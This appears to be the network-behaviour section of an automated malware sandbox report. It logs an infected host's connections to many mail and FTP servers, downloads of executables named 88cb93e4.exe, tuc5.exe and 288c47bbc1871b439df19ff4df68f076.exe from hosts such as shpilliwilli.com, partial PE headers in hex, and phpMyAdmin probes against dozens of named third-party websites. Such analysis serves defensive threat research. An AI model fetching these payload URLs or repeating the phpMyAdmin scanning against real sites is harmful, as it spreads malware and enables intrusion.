Source: global traffic	TCP traffic: 192.168.2.4:56077 -> 216.194.166.146:995
Source: global traffic	TCP traffic: 192.168.2.4:56080 -> 104.47.71.202:143
Source: global traffic	TCP traffic: 192.168.2.4:56084 -> 165.22.195.184:995
Source: global traffic	TCP traffic: 192.168.2.4:56087 -> 136.147.189.244:995
Source: global traffic	TCP traffic: 192.168.2.4:56089 -> 51.81.206.108:995
Source: global traffic	TCP traffic: 192.168.2.4:56094 -> 62.149.128.163:143
Source: global traffic	TCP traffic: 192.168.2.4:56099 -> 46.30.211.110:995
Source: global traffic	TCP traffic: 192.168.2.4:56149 -> 104.47.18.74:143
Source: global traffic	TCP traffic: 192.168.2.4:56156 -> 200.58.122.206:143
Source: global traffic	TCP traffic: 192.168.2.4:56155 -> 52.101.9.2:995
Source: global traffic	TCP traffic: 192.168.2.4:56277 -> 217.70.178.216:993
Source: global traffic	TCP traffic: 192.168.2.4:56531 -> 8.31.233.184:143
Source: global traffic	TCP traffic: 192.168.2.4:56587 -> 218.213.216.3:995
Source: global traffic	TCP traffic: 192.168.2.4:56589 -> 156.38.230.76:143
Source: global traffic	TCP traffic: 192.168.2.4:57739 -> 68.178.252.117:995
Source: global traffic	TCP traffic: 192.168.2.4:59288 -> 15.197.142.173:995
Source: global traffic	TCP traffic: 192.168.2.4:59632 -> 104.47.55.138:995
Source: global traffic	TCP traffic: 192.168.2.4:59684 -> 52.86.6.113:995
Source: global traffic	TCP traffic: 192.168.2.4:59730 -> 15.197.148.33:143
Source: global traffic	TCP traffic: 192.168.2.4:59771 -> 62.149.128.151:143
Source: global traffic	TCP traffic: 192.168.2.4:59793 -> 52.101.41.0:995
Source: global traffic	TCP traffic: 192.168.2.4:59798 -> 68.178.213.244:995
Source: global traffic	TCP traffic: 192.168.2.4:59953 -> 18.208.22.77:143
Source: global traffic	TCP traffic: 192.168.2.4:59967 -> 209.222.82.252:143
Source: global traffic	TCP traffic: 192.168.2.4:59990 -> 67.231.154.162:143
Source: global traffic	TCP traffic: 192.168.2.4:59993 -> 76.223.54.146:995
Source: global traffic	TCP traffic: 192.168.2.4:59996 -> 207.211.30.141:143
Source: global traffic	TCP traffic: 192.168.2.4:60016 -> 67.195.228.75:995
Source: global traffic	TCP traffic: 192.168.2.4:60052 -> 104.47.75.228:995
Source: global traffic	TCP traffic: 192.168.2.4:60053 -> 52.40.235.249:220
Source: global traffic	TCP traffic: 192.168.2.4:60062 -> 212.159.9.200:3535
Source: global traffic	TCP traffic: 192.168.2.4:60083 -> 85.234.244.77:143
Source: global traffic	TCP traffic: 192.168.2.4:60084 -> 104.47.71.138:143
Source: global traffic	TCP traffic: 192.168.2.4:60098 -> 104.47.17.138:143
Source: global traffic	TCP traffic: 192.168.2.4:61699 -> 62.149.128.166:143
Source: global traffic	TCP traffic: 192.168.2.4:61993 -> 3.33.152.147:995
Source: global traffic	TCP traffic: 192.168.2.4:62407 -> 209.124.80.122:222
Source: global traffic	TCP traffic: 192.168.2.4:63791 -> 205.178.132.70:143
Source: global traffic	TCP traffic: 192.168.2.4:64808 -> 206.188.192.247:990
Source: global traffic	TCP traffic: 192.168.2.4:64867 -> 64.68.191.221:990
Source: global traffic	TCP traffic: 192.168.2.4:65075 -> 66.254.66.55:990
Source: global traffic	TCP traffic: 192.168.2.4:65164 -> 91.132.253.137:990
Source: global traffic	TCP traffic: 192.168.2.4:50484 -> 104.24.82.4:222
Source: global traffic	TCP traffic: 192.168.2.4:50501 -> 104.21.52.80:222
Source: global traffic	TCP traffic: 192.168.2.4:50502 -> 35.168.67.138:222
Source: global traffic	TCP traffic: 192.168.2.4:50505 -> 141.193.213.10:990
Source: global traffic	TCP traffic: 192.168.2.4:50509 -> 104.143.9.211:990
Source: global traffic	TCP traffic: 192.168.2.4:51826 -> 185.230.63.171:222
Source: global traffic	TCP traffic: 192.168.2.4:52440 -> 104.26.0.173:222
Source: global traffic	TCP traffic: 192.168.2.4:52532 -> 67.222.150.127:995
Source: global traffic	TCP traffic: 192.168.2.4:55195 -> 167.172.236.129:990
Source: global traffic	TCP traffic: 192.168.2.4:55213 -> 116.90.51.60:222
Source: global traffic	TCP traffic: 192.168.2.4:55270 -> 104.17.71.73:990
Source: global traffic	TCP traffic: 192.168.2.4:55272 -> 103.42.111.169:222
Source: global traffic	TCP traffic: 192.168.2.4:55300 -> 13.126.65.12:222
Source: global traffic	TCP traffic: 192.168.2.4:55304 -> 69.42.204.12:222
Source: global traffic	TCP traffic: 192.168.2.4:55307 -> 136.147.129.27:222
Source: global traffic	TCP traffic: 192.168.2.4:55306 -> 218.214.227.80:222
Source: global traffic	TCP traffic: 192.168.2.4:55328 -> 167.235.0.29:222
Source: global traffic	TCP traffic: 192.168.2.4:55335 -> 34.136.28.237:222
Source: global traffic	TCP traffic: 192.168.2.4:55337 -> 213.186.33.19:222
Source: global traffic	TCP traffic: 192.168.2.4:55457 -> 89.46.108.50:990
Source: global traffic	TCP traffic: 192.168.2.4:55557 -> 35.197.165.27:222
Source: global traffic	TCP traffic: 192.168.2.4:55562 -> 200.58.112.162:222
Source: global traffic	TCP traffic: 192.168.2.4:57151 -> 104.24.83.4:990
Source: global traffic	TCP traffic: 192.168.2.4:57169 -> 141.193.213.11:222
Source: global traffic	TCP traffic: 192.168.2.4:57170 -> 3.230.199.117:990
Source: global traffic	TCP traffic: 192.168.2.4:57174 -> 104.143.9.210:990
Source: global traffic	TCP traffic: 192.168.2.4:58093 -> 104.26.1.173:222
Source: global traffic	TCP traffic: 192.168.2.4:58465 -> 183.111.174.109:990
Source: global traffic	TCP traffic: 192.168.2.4:61383 -> 217.146.69.50:222

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0Date: Fri, 22 Dec 2023 20:12:35 GMTContent-Type: application/octet-streamConnection: closeContent-Description: File TransferContent-Disposition: attachment; filename=88cb93e4.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9b a4 a9 a0 df c5 c7 f3 df c5 c7 f3 df c5 c7 f3 c1 97 43 f3 f6 c5 c7 f3 c1 97 52 f3 c5 c5 c7 f3 c1 97 44 f3 50 c5 c7 f3 f8 03 bc f3 d8 c5 c7 f3 df c5 c6 f3 58 c5 c7 f3 c1 97 4d f3 de c5 c7 f3 c1 97 53 f3 de c5 c7 f3 c1 97 56 f3 de c5 c7 f3 52 69 63 68 df c5 c7 f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0f f5 5b 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ee 02 00 00 b8 02 00 00 00 00 00 1a 21 00 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 05 00 00 04 00 00 65 cc 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 2a 03 00 50 00 00 00 00 c0 03 00 e8 07 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 28 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d6 ed 02 00 00 10 00 00 00 ee 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 37 00 00 00 00 03 00 00 38 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 68 00 00 00 40 03 00 00 26 00 00 00 2a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 68 69 68 6f 6e 61 67 41 02 00 00 00 b0 03 00 00 04 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 07 02 00 00 c0 03 00 00 08 02 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 22 Dec 2023 20:12:43 GMTContent-Type: application/octet-streamContent-Length: 7599903Connection: keep-aliveContent-Description: File TransferContent-Disposition: attachment; filename=tuc5.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=goVlPJG%2FVO1VWKZcosMCBOG8BicahIC%2FD6FGdg3qIVK2HXMluqv9Taq2f9iBWe5K0i9XicuXzt5MNtpRjJ0RmQK3TamF25MFTTK6l7ouS%2BeZD6gdJEfmoZ3AgqvA%2BMwk1kCBEnrz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 839b0570098b6dc2-MIAalt-svc: h3=":443"; ma=86400Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 bb ed 85 65 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00 00 94 00 Data Ascii: MZP@!L!This program must be run under Win32$7PELeF@@@@P,CODEd

Source: Joe Sandbox View	IP Address: 171.25.193.9 171.25.193.9
Source: Joe Sandbox View	IP Address: 171.25.193.9 171.25.193.9

Source: Joe Sandbox View

ASN Name: DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAU DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAU

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 523e76adb7aac8f6a8b2bf1f35d85d1f
Source: Joe Sandbox View	JA3 fingerprint: 83d60721ecc423892660e275acc4dffd

Source: unknown

FTP traffic detected: 173.201.182.85:21 -> 192.168.2.4:52265 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 500 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 500 allowed.220-Local time is now 13:14. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 500 allowed.220-Local time is now 13:14. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 500 allowed.220-Local time is now 13:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 500 allowed.220-Local time is now 13:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic	TCP traffic: 192.168.2.4:55320 -> 216.69.141.82:25
Source: global traffic	TCP traffic: 192.168.2.4:55669 -> 104.47.75.164:587
Source: global traffic	TCP traffic: 192.168.2.4:55741 -> 177.153.23.241:587
Source: global traffic	TCP traffic: 192.168.2.4:55984 -> 199.59.243.225:25
Source: global traffic	TCP traffic: 192.168.2.4:56278 -> 136.147.189.244:25
Source: global traffic	TCP traffic: 192.168.2.4:60054 -> 104.47.75.228:587
Source: global traffic	TCP traffic: 192.168.2.4:62877 -> 185.230.63.107:587
Source: global traffic	TCP traffic: 192.168.2.4:63610 -> 38.181.56.100:587
Source: global traffic	TCP traffic: 192.168.2.4:63733 -> 31.214.176.67:587
Source: global traffic	TCP traffic: 192.168.2.4:64105 -> 165.22.195.184:587
Source: global traffic	TCP traffic: 192.168.2.4:50523 -> 3.94.41.167:587
Source: global traffic	TCP traffic: 192.168.2.4:50525 -> 3.33.130.190:587
Source: global traffic	TCP traffic: 192.168.2.4:50541 -> 54.161.222.85:587
Source: global traffic	TCP traffic: 192.168.2.4:50584 -> 104.21.69.169:587
Source: global traffic	TCP traffic: 192.168.2.4:50595 -> 34.205.242.146:587
Source: global traffic	TCP traffic: 192.168.2.4:50924 -> 104.47.66.10:587
Source: global traffic	TCP traffic: 192.168.2.4:50968 -> 104.47.71.202:587
Source: global traffic	TCP traffic: 192.168.2.4:54107 -> 217.70.178.216:587
Source: global traffic	TCP traffic: 192.168.2.4:54117 -> 202.130.44.227:587
Source: global traffic	TCP traffic: 192.168.2.4:55551 -> 85.234.244.76:587
Source: global traffic	TCP traffic: 192.168.2.4:55591 -> 218.213.216.3:587
Source: global traffic	TCP traffic: 192.168.2.4:55603 -> 107.158.136.76:587
Source: global traffic	TCP traffic: 192.168.2.4:55691 -> 50.31.65.5:587
Source: global traffic	TCP traffic: 192.168.2.4:55779 -> 62.149.128.163:587
Source: global traffic	TCP traffic: 192.168.2.4:55802 -> 205.139.110.221:587
Source: global traffic	TCP traffic: 192.168.2.4:56265 -> 3.126.94.219:587
Source: global traffic	TCP traffic: 192.168.2.4:56268 -> 121.53.85.23:587
Source: global traffic	TCP traffic: 192.168.2.4:56269 -> 64.233.186.27:587
Source: global traffic	TCP traffic: 192.168.2.4:56299 -> 200.58.122.206:587
Source: global traffic	TCP traffic: 192.168.2.4:56301 -> 208.91.197.26:587
Source: global traffic	TCP traffic: 192.168.2.4:56308 -> 38.177.197.58:587
Source: global traffic	TCP traffic: 192.168.2.4:56309 -> 44.194.75.85:587
Source: global traffic	TCP traffic: 192.168.2.4:56312 -> 8.31.233.168:587
Source: global traffic	TCP traffic: 192.168.2.4:56313 -> 142.250.27.26:587
Source: global traffic	TCP traffic: 192.168.2.4:56321 -> 205.178.189.129:587
Source: global traffic	TCP traffic: 192.168.2.4:56343 -> 185.162.89.66:587
Source: global traffic	TCP traffic: 192.168.2.4:56354 -> 216.194.166.146:587
Source: global traffic	TCP traffic: 192.168.2.4:56355 -> 209.182.195.165:587
Source: global traffic	TCP traffic: 192.168.2.4:56508 -> 51.81.206.108:587
Source: global traffic	TCP traffic: 192.168.2.4:56539 -> 115.111.182.213:587
Source: global traffic	TCP traffic: 192.168.2.4:56679 -> 8.31.233.184:587
Source: global traffic	TCP traffic: 192.168.2.4:57176 -> 15.197.148.33:587
Source: global traffic	TCP traffic: 192.168.2.4:57177 -> 52.86.6.113:587
Source: global traffic	TCP traffic: 192.168.2.4:57264 -> 104.47.59.138:587
Source: global traffic	TCP traffic: 192.168.2.4:57279 -> 104.47.71.138:587
Source: global traffic	TCP traffic: 192.168.2.4:57295 -> 104.47.17.138:587
Source: global traffic	TCP traffic: 192.168.2.4:57837 -> 34.206.39.153:587
Source: global traffic	TCP traffic: 192.168.2.4:59343 -> 62.149.128.151:587
Source: global traffic	TCP traffic: 192.168.2.4:59533 -> 156.38.230.76:587
Source: global traffic	TCP traffic: 192.168.2.4:59638 -> 85.234.244.77:587
Source: global traffic	TCP traffic: 192.168.2.4:60402 -> 68.178.213.244:587

Source: global traffic	HTTP traffic detected: GET /288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: shpilliwilli.com
Source: global traffic	HTTP traffic detected: GET /e0c371ddca2abf5274ea12d860ff6dcd/288c47bbc1871b439df19ff4df68f076.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: linkofstrumble.com
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aldine.org.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: yandfcorp.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: easlab.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pmcsystem.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: aikya.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: flandria-loisirs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: grassgraphics.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: davescheirer.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: theproducebox.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: loghole.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: tgeddesgrant.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: jaydien.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: liberty25.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: thenile.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: customizedperformance.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: derrickandbriggs.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: indfos.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: esisalama.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ispsolucoes.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: oceanictrailers.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cannaclear.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: customintegrated.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: valentinegrowers.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: mcammond.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: intermountainmls.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: bldowney.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: oljud.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cicfl.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: adelaideclub.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: adm-works.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: saltdelcolom.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: conquestaccounting.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: dl-it.netAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pistik.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ireland-ventures.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: fotoestudiomiret.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: fuckyoufriday.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ismaworld.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: geis.com.auAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: covicol.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: shapeab.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: omuramba.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: pcfocus.com.hkAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: dpikorea.orgAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
